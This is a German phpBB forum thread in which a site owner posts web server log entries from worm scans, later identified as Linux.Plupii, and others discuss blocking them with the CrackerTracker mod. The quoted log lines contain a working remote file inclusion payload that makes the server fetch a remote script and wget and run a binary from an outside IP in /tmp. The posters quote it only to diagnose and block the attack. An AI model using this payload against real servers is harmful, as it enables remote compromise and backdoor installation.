bewusster Hackversuch oder Wurm?

Sicherheit des Webservers, der Server und rund um phpBB
Antworten
Benutzeravatar
Dungeonwatcher
Beiträge: 1055
Registriert: Sa 19.Feb, 2005 01:16
Wohnort: Berlin
Kontaktdaten:

bewusster Hackversuch oder Wurm?

Beitrag von Dungeonwatcher »

'n Abend! :cool:

Seit Tagen wird mein Webserver mit solchenen Anfragen bombardiert:

Code: Alles auswählen

"GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=h...
"GET /Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81...
"GET /xmlrpc.php HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSIE 6.0; Windo...
"GET /blog/xmlrpc.php HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSIE 6.0;...
"GET /blog/xmlsrv/xmlrpc.php HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSI...
"GET /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MS...
"GET /drupal/xmlrpc.php HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSIE 6.0...
"GET /phpgroupware/xmlrpc.php HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MS...
"GET /wordpress/xmlrpc.php HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSIE...
"GET /xmlrpc.php HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSIE 6.0; Windo...
"GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSIE 6.0...
"GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSIE 6.0...
Diese kommen von den unterschiedlichsten IP-Adressen. Versucht da jemand bewusst eine Lücke zu finden, oder treibt da ein Wurm sein Unwesen?

Bye/2
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Würmer.
Wenn Du den Cracker Tracker eingebaut hast (Version 4.0.1 ist gerade aktuell). brauchst Du Dir keine Gedanken zu machen. Ansonsten: Einbauen!
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
Dungeonwatcher
Beiträge: 1055
Registriert: Sa 19.Feb, 2005 01:16
Wohnort: Berlin
Kontaktdaten:

Beitrag von Dungeonwatcher »

[quote="oxpus - Sa 17.Dez, 2005 20:12";p="50625"]Würmer.[/quote]

Weist du auch welcher sich da gerade vergeblich die Zähne ausbeisst?
Wenn Du den Cracker Tracker eingebaut hast (Version 4.0.1 ist gerade aktuell). brauchst Du Dir keine Gedanken zu machen. Ansonsten: Einbauen!
Upps, 4.0.1 schon? Die 4.0.0 ist hier wenige Minuten nach Veröffentlichung eingebaut gewesen. Da war ich sogar schneller als du. ;)
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

Wie gehn die denn weiter? Seltsame Art der Anfrage sieht nach Globals prüfung aus, nur obs geht. Krieg ich vielleicht mal die ganze Zeile zum anschauen? Die Attackform sieht recht neu aus. Brauche aber den ganzen String um den Wurmquellcode zu finden um ggf. die Filter anzupassen.
Benutzeravatar
Dungeonwatcher
Beiträge: 1055
Registriert: Sa 19.Feb, 2005 01:16
Wohnort: Berlin
Kontaktdaten:

Beitrag von Dungeonwatcher »

[quote="cback - Sa 17.Dez, 2005 23:31";p="50634"]Krieg ich vielleicht mal die ganze Zeile zum anschauen?[/quote]

Nu freilich doch... :cool:

Code: Alles auswählen

"GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

"GET /Forums/admin/admin_styles.phpadmin_styles.php?phpbb_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

"GET /xmlrpc.php HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

"GET /blog/xmlrpc.php HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

"GET /blog/xmlsrv/xmlrpc.php HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

"GET /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
[...]
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

Hatte gerade auf der SourceForge Projektseite für den CrackerTracker ein Feature Request, was mich auf Dein Phenomen hat stoßen lassen: http://sourceforge.net/tracker/index.ph ... tid=793939


Es sind, wie ich schon rausfinden konnte nun lediglich Tests, ob Dein Server eine Antwort liefert und damit anfällig für eine Lücke ist, die dann wiederum durch einen Schädlichen Wurm ausgenutzt werden kann. Diese Attacken sind also nicht tragisch und nicht gefährlich, sind nur nervig.

Dann werde ich eine kleine Änderung am CTracker Erkennungsengine durchführen und kann damit nicht nur schädliche Würmer, sondern auch alle Arten von diesen "Lage-Checkern" erkennen und blockieren. :D :D


PS: Tauchen diese Einträge im Log schon auf? Ich denke von dem was ich alles gefunden hab, dass CrackerTracker Heuristik das schon erkennt:

cmd=cd

cmd= ist zum Beispiel im Baukasten drin, also er schützt schon davor. ;) Also stehn diese Dinger auch im CrackerTracker Logfile? Meiner Blockt es, wenn ich es bei mir ausprobiere.
Zuletzt geändert von cback am So 18.Dez, 2005 00:03, insgesamt 2-mal geändert.
Benutzeravatar
Dungeonwatcher
Beiträge: 1055
Registriert: Sa 19.Feb, 2005 01:16
Wohnort: Berlin
Kontaktdaten:

Beitrag von Dungeonwatcher »

[quote="cback - So 18.Dez, 2005 00:00";p="50640"]Es sind, wie ich schon rausfinden konnte nun lediglich Tests, ob Dein Server eine Antwort liefert und damit anfällig für eine Lücke ist, die dann wiederum durch einen Schädlichen Wurm ausgenutzt werden kann. Diese Attacken sind also nicht tragisch und nicht gefährlich, sind nur nervig.[/quote]

Ahja. Zumindest versauen die mir meine Statistik der nichtgefundenen Seiten. ^7
Dann werde ich eine kleine Änderung am CTracker Erkennungsengine durchführen und kann damit nicht nur schädliche Würmer, sondern auch alle Arten von diesen "Lage-Checkern" erkennen und blockieren.
Cool. :cool:
PS: Tauchen diese Einträge im Log schon auf? Ich denke von dem was ich alles gefunden hab, dass CrackerTracker Heuristik das schon erkennt:
Im Server.log stehen diese so drinn.
Also stehn diese Dinger auch im CrackerTracker Logfile? Meiner Blockt es, wenn ich es bei mir ausprobiere.
Nein, denn soweit kommt die Anfrage garnicht, da die abgefragten Pfade hier nicht existieren. ^d
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

Achso, ja z.B der XTreme Styles Mod entfernt ja diese Styles Datei, dann kommt es auch nicht am CTracker vorbei weil das Forum ja gar nicht geladen wird. Aber ich habe mich mal schlau gemacht, die Heuristik erkennt schon im aktuellen 4.0.1 Release alle diese Testarten. Häng z.B mal den String an eine andere Datei. admin_users.php zum Beispiel, springt direkt an der CTracker :)

Kann ich dem Kandidaten auf SourceForge auch gleich mal mitteilen. :D
Titus
Beiträge: 235
Registriert: Fr 18.Mär, 2005 22:23

Beitrag von Titus »

[quote="Dungeonwatcher - Sa 17.Dez, 2005 23:58";p="50639"]

Code: Alles auswählen

"GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
[/quote]
läuft dein Forum unter /modules/ ?? ^5 (wohl kaum)

sind das nicht einfach automatische anfragen für/gegen (php)nuke nutzer?

ist der CT eigentlich (php-/post-)nuke tauglich (die währen sicher froh drum ;) )

mit der .htaccess (hier schon mehrfah gepostet) lässt sich das spektakel wohl auch recht gut blocken der CT ist zumindest von den requests absolut arbeitslos (muss ich immer selber herhalten ob er überhaupt noch funktioniert weil sich nichts tut) :D
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

[quote="Titus - 12.Dezember 2005, 11:33";p="50655"]
ist der CT eigentlich (php-/post-)nuke tauglich (die währen sicher froh drum ;) )
[/quote]

Die StandAlone Fassung davon ja: http://www.cback.de/cback_software/standalonect.php

Hat auch neulich jemand für WBB angepasst, der wollte sich auch irgendwann mal an die große Professional machen, damit ich auch im WBB Sektor el Securer numero uno werde. :D :D :D :D
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Das schaffst Du doch locker, Cback :cool:
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

ich krieg kein WBB2 Forum des is das Ding, das kostet ja Geld, was ich net so hab.
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Yepp, ist schon klar. ;)
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Titus
Beiträge: 235
Registriert: Fr 18.Mär, 2005 22:23

Beitrag von Titus »

[quote="cback - Mo 19.Dez, 2005 14:39";p="50711"]
Die StandAlone Fassung davon ja: http://www.cback.de/cback_software/standalonect.php
[/quote]
na ok das ding ist ja keine kunst zu implementieren (hab ich sogar in nem vB geschafft incl logger und aktuellen definitionen :p ), dachte nur da das phpBB vom *nuke ja ähnlich dem original ist gibts da noch ne alternative (IMO sind die auch nicht die schnellsten bei den updates // seh nur uralt phpBBs wenn ich mal eines in nem nuke zu gesicht bekomme)
Benutzeravatar
Dungeonwatcher
Beiträge: 1055
Registriert: Sa 19.Feb, 2005 01:16
Wohnort: Berlin
Kontaktdaten:

Beitrag von Dungeonwatcher »

Hi! :cool:

Jetzt weiss ich was das ist, ein Würmchen: "Linux.Plupii is a worm with back door capabilities that spreads by exploiting several Web server-related vulnerabilities.". Genaueres dazu steht

hier

Bye/2
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Netter Name ;) :mad:
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
Dungeonwatcher
Beiträge: 1055
Registriert: Sa 19.Feb, 2005 01:16
Wohnort: Berlin
Kontaktdaten:

Beitrag von Dungeonwatcher »

Jou, aber sonst ist er nicht besonders nett:
Symantec @ 07, Nov, 2005 hat geschrieben:Symantec schätzt die Verbreitung von Linux.Plupii bisher als gering ein, er birgt jedoch das Potential, sich schnell zu vermehren - wie die effektiven Schäden auf den betroffenen Systemen ausfallen, hängt im wesentlichen vom "Wohlwollen" des Angreifers ab, der die bereitgestellte Backdoor ausnutzt.

Der Wurm verbreitet sich ohne Zutun der Anwender. Er nutzt dazu drei Sicherheitslücken in Linux-Webserver-Applikationen.

Hat sich der Wurm über diese Sicherheitslücken in einem System installiert, öffnet er eine Hintertür auf UDP-Port 7222 und sendet über diesen Port eine Benachrichtigung an seinen Urheber. Der erhält durch die Hintertür Zugriff auf das befallene System.

Entdeckt ein Virenschutz-Programm Linux.Plupii, besteht daher die Möglichkeit, dass der Angreifer bereits weitere Änderungen am System vorgenommen hat. Symantec empfiehlt daher im Fall einer Entdeckung eine komplette Neuinstallation des Betriebssytems, sofern ein solcher Zugriff nicht mit absoluter Sicherheit ausgeschlossen werden kann.
Und vermehren tut er sich wohl gerade mächtig. Ich bin nämlich nicht der Einzige dem diese Einträge im Server Log aufgefallen sind. In der NG "ger.ct" gibt es mittlerweile auch eine größere Diskussion darüber.

Bye/2
Zuletzt geändert von Dungeonwatcher am Do 22.Dez, 2005 14:22, insgesamt 1-mal geändert.
Titus
Beiträge: 235
Registriert: Fr 18.Mär, 2005 22:23

Beitrag von Titus »

[quote="Dungeonwatcher - Do 22.Dez, 2005 14:19";p="50890"]In der NG "ger.ct" gibt es mittlerweile auch eine größere Diskussion darüber.
[/quote]
der CrackTracker hat ne newsgroup :respect:
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

Und ne eigene PC Zeitschrift. :D
Benutzeravatar
AmigaLink
Beiträge: 5843
Registriert: Mi 03.Mär, 2004 09:05
Wohnort: NRW
Kontaktdaten:

Beitrag von AmigaLink »

:bofl:
[center].: Web Relax .::. Essen mit Freude .::. AmigaLink.de :.
______________________________________

Kein Support per PM, ICQ oder eMail!!!
[/center]
Antworten